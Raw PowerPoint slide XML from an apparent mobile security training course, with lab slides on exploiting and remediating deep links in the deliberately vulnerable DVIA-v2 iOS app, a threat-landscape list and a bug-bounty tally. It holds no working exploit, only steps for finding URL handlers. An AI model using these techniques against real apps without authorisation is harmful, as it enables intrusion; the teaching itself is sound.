            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>Perform</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> the action </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>ONLY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> if the user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>confirms</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{943E87E0-3C18-4296-BDF3-DA8ED55ED712}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t>Labs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Exercice 5 : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Exploiting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>DeepLinks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Remediation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="Fichier:Android logo 2019 (stacked).sv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ool&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36DB72C8-68AE-44EB-8C95-BD0880784DDA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect l="21667" r="22639"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3434874" y="4457700"/>
            <a:ext cx="2274252" cy="2133600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1738853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a:t>Your </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" err="1"/>
              <a:t>bounty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t> !</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="58370" name="Picture 2" descr="🤑 Émoji Argent Dans Les Yeux Et La Bouche sur WhatsApp 2.20.20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7" y="1974850"/>
            <a:ext cx="965200" cy="96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465339772"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3377247" y="3283135"/>
          <a:ext cx="2278380" cy="582930"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="2278380">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 $ 1540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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="9" name="Table 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A4E016D8-2342-47DF-B400-33D03DCC341B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4162011759"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5655627" y="5607235"/>
          <a:ext cx="3266159" cy="582930"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="3266159">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1822739905"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="0">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="3200" b="0">
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t>Total : $ 3290</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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="299863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nSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Sensitive information stored in the APK client Binary</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Vulnerabilities between APP &lt;-&gt; Server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Vulnerabilities between APP &lt;-&gt; 3rd Party Servers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Vulnerabilities related to data stored by the Operating System</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Vulnerabilities related to data stored in application sandbox</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Static Vulnerabilities in the APP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Vulnerabilities in the APP during runtime</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Vulnerabilities between APP &lt;-&gt; APP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Vulnerabilities in the Web Server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Vulnerabilities in the Remote Datastores</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Titre 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Mobile Security Introduction</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du texte 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Mobile Security Threat Landscape</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1048835"/>
            <a:ext cx="82296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fr-FR" sz="1100"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4170992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Labs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>And …</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="7" name="Table 6"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3983765157"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2594726" y="2940049"/>
          <a:ext cx="3747381" cy="582930"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="3747381">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1822739905"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="0">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="3200" b="0" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t>What about iOS ?</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="47625" marR="47625" marT="47625" marB="47625" anchor="ctr">
                    <a:lnL>
                      <a:noFill/>
                    </a:lnL>
                    <a:lnR>
                      <a:noFill/>
                    </a:lnR>
                    <a:lnT>
                      <a:noFill/>
                    </a:lnT>
                    <a:lnB>
                      <a:noFill/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="FFFFFF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="477292628"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14340" name="Picture 4" descr="Stickers sur le thème Question Emoji | Redbubble">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E1886D4-46CE-6586-86BF-F9B7387D1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558" y="3710562"/>
            <a:ext cx="1069716" cy="106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62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fr-FR" sz="1800" i="1" dirty="0"/>
              <a:t>For </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" i="1" dirty="0" err="1"/>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" i="1" dirty="0"/>
              <a:t> section, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" i="1" dirty="0" err="1"/>
              <a:t>we</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" i="1" dirty="0" err="1"/>
              <a:t>will</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" i="1" dirty="0"/>
              <a:t> use the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" i="1" dirty="0" err="1"/>
              <a:t>following</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" i="1" dirty="0"/>
              <a:t> version of DVIA-V2 for iOS :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1800" i="1" dirty="0">
              <a:hlinkClick r:id="rId3"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" i="1" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://github.com/TmmmmmR/mobile-training/raw/master/ios/dvia.ipa</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1800" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1800" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t>Read more about </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>it</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1800" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" i="1" dirty="0"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" i="1" dirty="0" err="1"/>
              <a:t>github.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" i="1" dirty="0"/>
              <a:t>/prateek147/DVIA-v2</a:t>
            </a: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95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gn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>Does</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> the app </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>implement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> a URL handler? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>If </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>so</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>could</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>be</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>interesting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> surface. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>How can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>we</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>find</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>Option 1: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Without</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>Xcode</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>Look at the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>Info.plist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>within</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> the app source code (not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>dependencies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>Commands</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>:</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 cd /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Labs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/DVIA-2/</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grep</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UrLScheme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -A 4 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>Output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t="74246" r="2733"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="418729" y="4789485"/>
            <a:ext cx="8125196" cy="1400680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2274515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016609"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>Does</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> the app </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>implement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> a URL handler? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>If </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>so</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>could</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>be</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>interesting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> surface. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>How can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>we</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>find</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>Option 2 : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>With</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
